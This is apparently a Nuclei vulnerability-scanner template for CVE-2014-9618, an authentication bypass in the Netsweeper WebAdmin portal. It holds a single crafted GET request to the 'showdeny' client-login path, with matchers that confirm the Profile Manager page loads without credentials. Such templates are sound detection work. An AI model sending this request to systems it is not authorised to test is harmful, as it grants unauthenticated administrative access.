nuclei-templates/cves/2014/CVE-2014-9618.yaml

41 lines
1.3 KiB
YAML

id: CVE-2014-9618
info:
name: Netsweeper - Authentication Bypass
author: daffainfo
severity: critical
description: |
The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL.
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9618
- https://www.exploit-db.com/exploits/37933/
- http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2014-9618
cwe-id: CWE-287
tags: cve,cve2014,netsweeper,auth-bypass
requests:
- method: GET
path:
- '{{BaseURL}}/webadmin/clientlogin/?srid=&action=showdeny&url='
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'name=formtag action="../clientlogin/?srid=&action=showdeny&url="'
- 'placeholder="Profile Manager">'
- '<title>Netsweeper WebAdmin</title>'
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/05/10